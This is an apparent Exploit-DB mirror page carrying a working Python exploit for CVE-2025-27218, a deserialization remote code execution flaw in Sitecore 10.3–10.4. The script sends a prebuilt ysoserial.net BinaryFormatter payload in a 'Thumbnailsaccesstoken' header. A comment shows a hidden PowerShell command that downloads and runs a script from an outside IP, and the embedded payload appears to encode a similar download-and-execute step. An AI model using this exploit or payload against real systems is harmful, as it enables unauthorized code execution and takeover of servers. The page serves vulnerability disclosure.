Sitecore 10.4 – Remote Code Execution (RCE)

June 29, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title Sitecore 10.4 – Remote Code Execution (RCE)
Exploit ID EDB-ID:52344
Type exploitdb
Published 2025-06-26T00:00:00
Modified 2025-06-26T00:00:00

CVSS Information

CVSS Score 5.3
Severity MEDIUM
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE Information

  • CVE-2025-27218

Exploit Description

Exploit Title: Sitecore 10.4 – Remote Code Execution (RCE)…

Exploit Code

# Exploit Title: Sitecore 10.4 – Remote Code Execution (RCE)

# Exploit Author: Yesith Alvarez

# Vendor Homepage: https://developers.sitecore.com/downloads

# Version: Sitecore 10.3 – 10.4

# CVE : CVE-2025-27218

# Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py

from requests import Request, Session

import sys

import base64

def title():

print(”’

_______ ________ ___ ___ ___ _____ ___ ______ ___ __ ___

/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \____ |__ \/_ |/ _ \

| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | / / ) || | (_) |

| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / / / / / | |> _ <
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ / / / /_ | | (_) |

\_____| \/ |______| |____|\___/____|____/ |____/_/ |____||_|\___/

[+] Remote Code Execution

Author: Yesith Alvarez

Github: https://github.com/yealvarez

Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/

Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py

”’)

def exploit(url):

# This payload must be generated externally with ysoserial.net

# Example: ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c “powershell.exe -nop -w hidden -c ‘IEX(New-Object Net.WebClient).DownloadString(\”http://34.134.71.169/111.html\”)'”

payload = ‘AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA2ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBb3dZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUhCdmQyVnljMmhsYkd3dVpYaGxJQzF1YjNBZ0xYY2dhR2xrWkdWdUlDMWpJQ2RKUlZnb1RtVjNMVTlpYW1WamRDQk9aWFF1VjJWaVEyeHBaVzUwS1M1RWIzZHViRzloWkZOMGNtbHVaeWdtY1hWdmREc2dhSFIwY0Rvdkx6RXdMakV3TGpFd0xqRXdMekV4TVM1b2RHMXNYQ2tuSWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0L’

payload_encoded = payload

headers = {‘Thumbnailsaccesstoken’: payload_encoded}

s = Session()

req = Request(‘GET’, url, headers=headers)

prepped = req.prepare()

resp = s.send(prepped, verify=False, timeout=15)

print(prepped.headers)

print(url)

print(resp.status_code)

print(resp.text)

if __name__ == ‘__main__’:

title()

if len(sys.argv) < 2:
print(‘[+] USAGE: python3 %s https://\n’ % sys.argv[0])

print(‘[+] Example: python3 %s https://192.168.0.10\n’ % sys.argv[0])

exit(0)

else:

exploit(sys.argv[1])

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.